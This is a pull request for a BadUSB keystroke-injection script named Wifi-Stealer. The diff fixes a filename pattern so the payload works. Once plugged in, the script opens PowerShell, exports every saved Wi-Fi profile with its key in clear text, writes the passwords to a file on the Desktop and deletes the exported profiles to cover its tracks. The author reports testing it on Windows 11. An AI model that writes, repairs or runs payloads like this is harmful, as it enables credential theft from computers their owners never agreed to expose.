### PR TITLE
Updated Wifi-Stealer_ORG.txt

### DIFF
--- a/BadUSB/Wifi-Stealer_ORG.txt
+++ b/BadUSB/Wifi-Stealer_ORG.txt
@@ -9,5 +9,5 @@ DELAY 500
 STRING powershell 
 ENTER
 DELAY 500
-STRING cd C:\Users\$env:UserName\Desktop;netsh wlan export profile key=clear;Select-String -Path Wi-Fi-* -Pattern 'keyMaterial'>0.txt;del Wi-Fi-*;exit
+STRING cd C:\Users\$env:UserName\Desktop;netsh wlan export profile key=clear;Select-String -Path WiFi-* -Pattern 'keyMaterial'>0.txt;del WiFi-*;exit
 ENTER


### PR DESCRIPTION
When outputting the file it saves as Wifi not Wi-Fi- and does not output to 0.txt, simply removing the dash - between WiFi makes this then work as intended. Tested and working on Windows 11.